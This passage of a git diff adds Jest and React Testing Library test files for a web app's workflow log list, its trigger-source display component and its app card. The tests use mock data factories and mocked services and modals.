+}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('WorkflowAppLogList', () => { + const defaultOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render loading state when logs are undefined', () => { + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render loading state when appDetail is undefined', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render table when data is available', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByRole('table')).toBeInTheDocument() + }) 
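The three factories above compose through spread overrides, so each test pins down only the fields it actually asserts on and inherits defaults for everything else. A short usage sketch with hypothetical values:

```typescript
// Hypothetical composition: only the run status and token count are overridden;
// every other field keeps its factory default.
const failedLog = createMockWorkflowLog({
  workflow_run: createMockWorkflowRun({ status: 'failed', total_tokens: 0 }),
})
const logs = createMockLogsResponse([failedLog], 1)
// data.length === total here, so the factory computes has_more as false
```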
+ + it('should render all table headers', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.user')).toBeInTheDocument() + }) + + it('should render trigger column for workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const workflowApp = createMockApp({ mode: 'workflow' as AppModeEnum }) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.triggered_from')).toBeInTheDocument() + }) + + it('should not render trigger column for non-workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Display Tests + // -------------------------------------------------------------------------- + describe('Status Display', () => { + it('should render success status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'succeeded' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should render failure status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'failed' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Failure')).toBeInTheDocument() + }) + + it('should render stopped status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'stopped' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Stop')).toBeInTheDocument() + }) + + it('should render running status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'running' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Running')).toBeInTheDocument() + }) + + it('should render partial-succeeded status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'partial-succeeded' as WorkflowRunDetail['status'] }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // User Info Display Tests + // -------------------------------------------------------------------------- + describe('User Info Display', () => { + it('should display account name when created by account', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: { id: 'acc-1', name: 'John Doe', email: 'john@example.com' }, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('John Doe')).toBeInTheDocument() + }) + + it('should display end user session id when created by end user', () => { + const logs = 
createMockLogsResponse([ + createMockWorkflowLog({ + created_by_end_user: { id: 'user-1', type: 'browser', is_anonymous: false, session_id: 'session-abc-123' }, + created_by_account: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('session-abc-123')).toBeInTheDocument() + }) + + it('should display N/A when no user info', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: undefined, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('N/A')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Sorting Tests + // -------------------------------------------------------------------------- + describe('Sorting', () => { + it('should sort logs in descending order by default', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + // First row is header, data rows start from index 1 + // In descending order, newest (3000) should be first + expect(rows.length).toBe(4) // 1 header + 3 data rows + }) + + it('should toggle sort order when clicking on start time header', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + ]) + + render( + , + ) + + // Click on the start time header to toggle sort + const startTimeHeader = screen.getByText('appLog.table.header.startTime') + await user.click(startTimeHeader) + + // Arrow should rotate (indicated by class change) + // The sort icon should have rotate-180 class for ascending + const sortIcon = startTimeHeader.closest('div')?.querySelector('svg') + expect(sortIcon).toBeInTheDocument() + }) + + it('should render sort arrow icon', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + // Check for ArrowDownIcon presence + const sortArrow = container.querySelector('svg.ml-0\\.5') + expect(sortArrow).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Drawer Tests + // -------------------------------------------------------------------------- + describe('Drawer', () => { + it('should open drawer when clicking on a log row', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-123' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + id: 'log-1', + workflow_run: createMockWorkflowRun({ id: 'run-456' }), + }), + ]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) // Click first data row + + const dialog = await screen.findByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should close drawer and call onRefresh when closing', async () => { + const user = userEvent.setup() + const onRefresh = jest.fn() + useAppStore.setState({ appDetail: createMockApp() }) + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await 
screen.findByRole('dialog') + + // Close drawer using Escape key + await user.keyboard('{Escape}') + + await waitFor(() => { + expect(onRefresh).toHaveBeenCalled() + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + }) + + it('should highlight selected row', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + const dataRow = dataRows[1] + + // Before click - no highlight + expect(dataRow).not.toHaveClass('bg-background-default-hover') + + // After click - has highlight (via currentLog state) + await user.click(dataRow) + + // The row should have the selected class + expect(dataRow).toHaveClass('bg-background-default-hover') + }) + }) + + // -------------------------------------------------------------------------- + // Replay Functionality Tests + // -------------------------------------------------------------------------- + describe('Replay Functionality', () => { + it('should allow replay when triggered from app-run', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'run-to-replay', + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for app-run triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay/workflow?replayRunId=run-to-replay') + }) + + it('should allow replay when triggered from debugging', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-debug' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'debug-run', + triggered_from: WorkflowRunTriggeredFrom.DEBUGGING, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for debugging triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + }) + + it('should not show replay for webhook triggers', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-webhook' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'webhook-run', + triggered_from: WorkflowRunTriggeredFrom.WEBHOOK, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should not be present for webhook triggers + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Unread Indicator Tests + // -------------------------------------------------------------------------- + describe('Unread Indicator', () => { + it('should show unread 
indicator for unread logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: undefined, + }), + ]) + + const { container } = render( + , + ) + + // Unread indicator is a small blue dot + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).toBeInTheDocument() + }) + + it('should not show unread indicator for read logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: Date.now(), + }), + ]) + + const { container } = render( + , + ) + + // No unread indicator + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Runtime Display Tests + // -------------------------------------------------------------------------- + describe('Runtime Display', () => { + it('should display elapsed time with 3 decimal places', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 1.23456 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('1.235s')).toBeInTheDocument() + }) + + it('should display 0 elapsed time with special styling', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 0 }), + }), + ]) + + render( + , + ) + + const zeroTime = screen.getByText('0.000s') + expect(zeroTime).toBeInTheDocument() + expect(zeroTime).toHaveClass('text-text-quaternary') + }) + }) + + // -------------------------------------------------------------------------- + // Token Display Tests + // -------------------------------------------------------------------------- + describe('Token Display', () => { + it('should display total tokens', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ total_tokens: 12345 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('12345')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty table when logs data is empty', () => { + const logs = createMockLogsResponse([]) + + render( + , + ) + + const table = screen.getByRole('table') + expect(table).toBeInTheDocument() + + // Should only have header row + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle multiple logs correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(4) // 1 header + 3 data rows + }) + + it('should handle logs with missing workflow_run data gracefully', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + elapsed_time: 0, + total_tokens: 0, + }), + }), + ]) + + render( + , + ) + + 
expect(screen.getByText('0.000s')).toBeInTheDocument() + expect(screen.getByText('0')).toBeInTheDocument() + }) + + it('should handle null workflow_run.triggered_from for non-workflow apps', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + triggered_from: undefined as any, + }), + }), + ]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/workflow-log/list.tsx b/web/app/components/app/workflow-log/list.tsx index 0e9b5dd67f..cef8a98f44 100644 --- a/web/app/components/app/workflow-log/list.tsx +++ b/web/app/components/app/workflow-log/list.tsx @@ -12,7 +12,7 @@ import Drawer from '@/app/components/base/drawer' import Indicator from '@/app/components/header/indicator' import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { WorkflowRunTriggeredFrom } from '@/models/log' type ILogs = { diff --git a/web/app/components/app/workflow-log/trigger-by-display.spec.tsx b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx new file mode 100644 index 0000000000..6e95fc2f35 --- /dev/null +++ b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx @@ -0,0 +1,371 @@ +/** + * TriggerByDisplay Component Tests + * + * Tests the display of workflow trigger sources with appropriate icons and labels. + * Covers all trigger types: app-run, debugging, webhook, schedule, plugin, rag-pipeline. + */ + +import { render, screen } from '@testing-library/react' +import TriggerByDisplay from './trigger-by-display' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import type { TriggerMetadata } from '@/models/log' +import { Theme } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +let mockTheme = Theme.light +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => ({ theme: mockTheme }), +})) + +// Mock BlockIcon as it has complex dependencies +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: ({ type, toolIcon }: { type: string; toolIcon?: string }) => ( +
    <div data-testid="block-icon" data-type={type} data-tool-icon={toolIcon || ''}> + BlockIcon + </div>
    + ), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createTriggerMetadata = (overrides: Partial = {}): TriggerMetadata => ({ + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('TriggerByDisplay', () => { + beforeEach(() => { + jest.clearAllMocks() + mockTheme = Theme.light + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render icon container', () => { + const { container } = render( + , + ) + + // Should have icon container with flex layout + const iconContainer = container.querySelector('.flex.items-center.justify-center') + expect(iconContainer).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should apply custom className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('custom-class') + }) + + it('should show text by default (showText defaults to true)', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should hide text when showText is false', () => { + render( + , + ) + + expect(screen.queryByText('appLog.triggerBy.appRun')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Trigger Type Display Tests + // -------------------------------------------------------------------------- + describe('Trigger Types', () => { + it('should display app-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should display debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.debugging')).toBeInTheDocument() + }) + + it('should display webhook trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.webhook')).toBeInTheDocument() + }) + + it('should display schedule trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.schedule')).toBeInTheDocument() + }) + + it('should display plugin trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should display rag-pipeline-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineRun')).toBeInTheDocument() + }) + + it('should display rag-pipeline-debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineDebugging')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Plugin Metadata Tests + // -------------------------------------------------------------------------- + describe('Plugin Metadata', () => { + 
it('should display custom event name from plugin metadata', () => { + const metadata = createTriggerMetadata({ event_name: 'Custom Plugin Event' }) + + render( + , + ) + + expect(screen.getByText('Custom Plugin Event')).toBeInTheDocument() + }) + + it('should fallback to default plugin text when no event_name', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should use plugin icon from metadata in light theme', () => { + mockTheme = Theme.light + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use dark plugin icon in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'dark-icon.png') + }) + + it('should fallback to light icon when dark icon not available in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use default BlockIcon when plugin has no icon metadata', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', '') + }) + }) + + // -------------------------------------------------------------------------- + // Icon Rendering Tests + // -------------------------------------------------------------------------- + describe('Icon Rendering', () => { + it('should render WindowCursor icon for app-run trigger', () => { + const { container } = render( + , + ) + + // Check for the blue brand background used for app-run icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-brand-blue-brand-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Code icon for debugging trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for debugging icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render WebhookLine icon for webhook trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for webhook icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Schedule icon for schedule trigger', () => { + const { container } = render( + , + ) + + // Check for the violet background used for schedule icon + const iconWrapper = container.querySelector('.bg-util-colors-violet-violet-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render KnowledgeRetrieval icon for rag-pipeline triggers', () => { + const { container } = render( + , + ) + + // Check for the green background used for rag pipeline icon + const iconWrapper = container.querySelector('.bg-util-colors-green-green-500') + expect(iconWrapper).toBeInTheDocument() + }) + }) + + // 
-------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle unknown trigger type gracefully', () => { + // Test with a type cast to simulate unknown trigger type + render() + + // Should fallback to default (app-run) icon styling + expect(screen.getByText('unknown-type')).toBeInTheDocument() + }) + + it('should handle undefined triggerMetadata', () => { + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should handle empty className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('flex', 'items-center', 'gap-1.5') + }) + + it('should render correctly when both showText is false and metadata is provided', () => { + const metadata = createTriggerMetadata({ event_name: 'Test Event' }) + + render( + , + ) + + // Text should not be visible even with metadata + expect(screen.queryByText('Test Event')).not.toBeInTheDocument() + expect(screen.queryByText('appLog.triggerBy.plugin')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Theme Switching Tests + // -------------------------------------------------------------------------- + describe('Theme Switching', () => { + it('should render correctly in light theme', () => { + mockTheme = Theme.light + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render correctly in dark theme', () => { + mockTheme = Theme.dark + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/app-card.spec.tsx b/web/app/components/apps/app-card.spec.tsx new file mode 100644 index 0000000000..f7ff525ed2 --- /dev/null +++ b/web/app/components/apps/app-card.spec.tsx @@ -0,0 +1,1387 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import { AppModeEnum } from '@/types/app' +import { AccessMode } from '@/models/access-control' + +// Mock next/navigation +const mockPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + }), +})) + +// Mock use-context-selector with stable mockNotify reference for tracking calls +// Include createContext for components that use it (like Toast) +const mockNotify = jest.fn() +jest.mock('use-context-selector', () => { + const React = require('react') + return { + createContext: (defaultValue: any) => React.createContext(defaultValue), + useContext: () => ({ + notify: mockNotify, + }), + useContextSelector: (_context: any, selector: any) => selector({ + notify: mockNotify, + }), + } +}) + +// Mock app context +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: true, + }), +})) + +// Mock provider context +const mockOnPlanInfoChanged = jest.fn() +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + onPlanInfoChanged: mockOnPlanInfoChanged, + }), +})) + +// Mock global public store - allow dynamic configuration +let mockWebappAuthEnabled = false +jest.mock('@/context/global-public-context', () => ({ + useGlobalPublicStore: (selector: (s: any) => any) => selector({ + systemFeatures: { + webapp_auth: { enabled: mockWebappAuthEnabled }, + branding: { enabled: 
false }, + }, + }), +})) + +// Mock API services - import for direct manipulation +import * as appsService from '@/service/apps' +import * as workflowService from '@/service/workflow' + +jest.mock('@/service/apps', () => ({ + deleteApp: jest.fn(() => Promise.resolve()), + updateAppInfo: jest.fn(() => Promise.resolve()), + copyApp: jest.fn(() => Promise.resolve({ id: 'new-app-id' })), + exportAppConfig: jest.fn(() => Promise.resolve({ data: 'yaml: content' })), +})) + +jest.mock('@/service/workflow', () => ({ + fetchWorkflowDraft: jest.fn(() => Promise.resolve({ environment_variables: [] })), +})) + +jest.mock('@/service/explore', () => ({ + fetchInstalledAppList: jest.fn(() => Promise.resolve({ installed_apps: [{ id: 'installed-1' }] })), +})) + +jest.mock('@/service/access-control', () => ({ + useGetUserCanAccessApp: () => ({ + data: { result: true }, + isLoading: false, + }), +})) + +// Mock hooks +const mockOpenAsyncWindow = jest.fn() +jest.mock('@/hooks/use-async-window-open', () => ({ + useAsyncWindowOpen: () => mockOpenAsyncWindow, +})) + +// Mock utils +jest.mock('@/utils/app-redirection', () => ({ + getRedirection: jest.fn(), +})) + +jest.mock('@/utils/var', () => ({ + basePath: '', +})) + +jest.mock('@/utils/time', () => ({ + formatTime: () => 'Jan 1, 2024', +})) + +// Mock dynamic imports +jest.mock('next/dynamic', () => { + const React = require('react') + return (importFn: () => Promise) => { + const fnString = importFn.toString() + + if (fnString.includes('create-app-modal') || fnString.includes('explore/create-app-modal')) { + return function MockEditAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'edit-app-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-edit-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Updated App', + icon_type: 'emoji', + icon: '🎯', + icon_background: '#FFEAD5', + description: 'Updated description', + use_icon_as_answer_icon: false, + max_active_requests: null, + }), + 'data-testid': 'confirm-edit-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('duplicate-modal')) { + return function MockDuplicateAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'duplicate-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-duplicate-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Copied App', + icon_type: 'emoji', + icon: '📋', + icon_background: '#E4FBCC', + }), + 'data-testid': 'confirm-duplicate-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('switch-app-modal')) { + return function MockSwitchAppModal({ show, onClose, onSuccess }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'switch-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-switch-modal' }, 'Close'), + React.createElement('button', { 'onClick': onSuccess, 'data-testid': 'confirm-switch-modal' }, 'Switch'), + ) + } + } + if (fnString.includes('base/confirm')) { + return function MockConfirm({ isShow, onCancel, onConfirm }: any) { + if (!isShow) return null + return React.createElement('div', { 'data-testid': 'confirm-dialog' }, + React.createElement('button', { 'onClick': onCancel, 'data-testid': 'cancel-confirm' }, 'Cancel'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 
'confirm-confirm' }, 'Confirm'), + ) + } + } + if (fnString.includes('dsl-export-confirm-modal')) { + return function MockDSLExportModal({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'dsl-export-modal' }, + React.createElement('button', { 'onClick': () => onClose?.(), 'data-testid': 'close-dsl-export' }, 'Close'), + React.createElement('button', { 'onClick': () => onConfirm?.(true), 'data-testid': 'confirm-dsl-export' }, 'Export with secrets'), + React.createElement('button', { 'onClick': () => onConfirm?.(false), 'data-testid': 'confirm-dsl-export-no-secrets' }, 'Export without secrets'), + ) + } + } + if (fnString.includes('app-access-control')) { + return function MockAccessControl({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'access-control-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-access-control' }, 'Close'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-access-control' }, 'Confirm'), + ) + } + } + return () => null + } +}) + +// Popover uses @headlessui/react portals - mock for controlled interaction testing +jest.mock('@/app/components/base/popover', () => { + const MockPopover = ({ htmlContent, btnElement, btnClassName }: any) => { + const [isOpen, setIsOpen] = React.useState(false) + const computedClassName = typeof btnClassName === 'function' ? btnClassName(isOpen) : '' + return React.createElement('div', { 'data-testid': 'custom-popover', 'className': computedClassName }, + React.createElement('div', { + 'onClick': () => setIsOpen(!isOpen), + 'data-testid': 'popover-trigger', + }, btnElement), + isOpen && React.createElement('div', { + 'data-testid': 'popover-content', + 'onMouseLeave': () => setIsOpen(false), + }, + typeof htmlContent === 'function' ? 
htmlContent({ open: isOpen, onClose: () => setIsOpen(false), onClick: () => setIsOpen(false) }) : htmlContent, + ), + ) + } + return { __esModule: true, default: MockPopover } +}) + +// Tooltip uses portals - minimal mock preserving popup content as title attribute +jest.mock('@/app/components/base/tooltip', () => ({ + __esModule: true, + default: ({ children, popupContent }: any) => React.createElement('div', { title: popupContent }, children), +})) + +// TagSelector has API dependency (service/tag) - mock for isolated testing +jest.mock('@/app/components/base/tag-management/selector', () => ({ + __esModule: true, + default: ({ tags }: any) => { + const React = require('react') + return React.createElement('div', { 'aria-label': 'tag-selector' }, + tags?.map((tag: any) => React.createElement('span', { key: tag.id }, tag.name)), + ) + }, +})) + +// AppTypeIcon has complex icon mapping - mock for focused component testing +jest.mock('@/app/components/app/type-selector', () => ({ + AppTypeIcon: () => React.createElement('div', { 'data-testid': 'app-type-icon' }), +})) + +// Import component after mocks +import AppCard from './app-card' + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Record = {}) => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + mode: AppModeEnum.CHAT, + icon: '🤖', + icon_type: 'emoji' as const, + icon_background: '#FFEAD5', + icon_url: null, + author_name: 'Test Author', + created_at: 1704067200, + updated_at: 1704153600, + tags: [], + use_icon_as_answer_icon: false, + max_active_requests: null, + access_mode: AccessMode.PUBLIC, + has_draft_trigger: false, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as any, + app_model_config: {} as any, + site: {} as any, + api_base_url: 'https://api.example.com', + ...overrides, +}) + +// ============================================================================ +// Tests +// 